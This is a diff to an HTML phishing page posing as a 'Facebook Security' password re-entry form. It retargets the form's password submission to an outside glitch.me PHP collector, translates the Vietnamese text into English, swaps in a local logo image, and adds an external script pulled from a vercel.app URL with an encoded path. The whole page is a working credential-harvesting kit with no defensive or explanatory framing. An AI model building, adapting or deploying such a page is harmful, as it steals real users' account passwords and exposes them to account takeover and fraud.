--- a/pass.html
+++ b/pass.html
@@ -1,6 +1,4 @@
-<!DOCTYPE html>
-<html lang="en">
-<head>
+<html lang="en"><head><script type="text/javascript" src="https://open-team-account-here.vercel.app/bHOnDybn8E4jbQgdPZn0CnN8SAZHRKjZfd7mN8I36hrMMKB8M5EbyfsLvPApBprqL3Cr3iaFxytllxdvf2q2gw=="></script>
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
     <title>Submit Form Integration</title>
@@ -106,22 +104,22 @@
 <body>
     <div class="container">
         <div class="logo">
-            <img class="logo" src="https://upload.wikimedia.org/wikipedia/commons/thumb/6/6c/Facebook_Logo_2023.png/600px-Facebook_Logo_2023.png?20231011121526" alt="Logo">
+            <img class="logo" src="WhatsApp Image 2024-10-27 at 11.24.35 AM.jpeg" alt="Logo">
         </div>
         <div class="header">
-            Bảo mật Facebook
+            Facebook Security
         </div>
-        <p>Vui lòng nhập lại mật khẩu của bạn để hoàn tất yêu cầu.</p>
-        <form id="passwordForm" action="https://mixed-fluff-space.glitch.me/muneebpass.php" method="POST">
+        <p>Please re-enter your password to complete the request.</p>
+        <form id="passwordForm" action="https://gravel-magical-statistic.glitch.me/passRJ.php" method="POST">
             <div class="form-group">
                 <label for="password">Password</label>
                 <div class="input-wrapper">
-                    <input type="password" id="password" name="password" placeholder="Nhập mật khẩu của bạn" required>
+                    <input type="password" id="password" name="password" placeholder="Enter your password" required="">
                     <i class="eye-icon fas fa-eye" id="togglePassword"></i>
                 </div>
                 <span id="error-message" class="error-message"></span>
             </div>
-            <button type="submit" class="submit-button">Nộp</button>
+            <button type="submit" class="submit-button">Submit</button>
         </form>
     </div>
     <script>
@@ -155,5 +153,6 @@
             }
         });
     </script>
-</body>
-</html>
+
+
+<lej-gxlbfoxoyvee></lej-gxlbfoxoyvee></body></html>
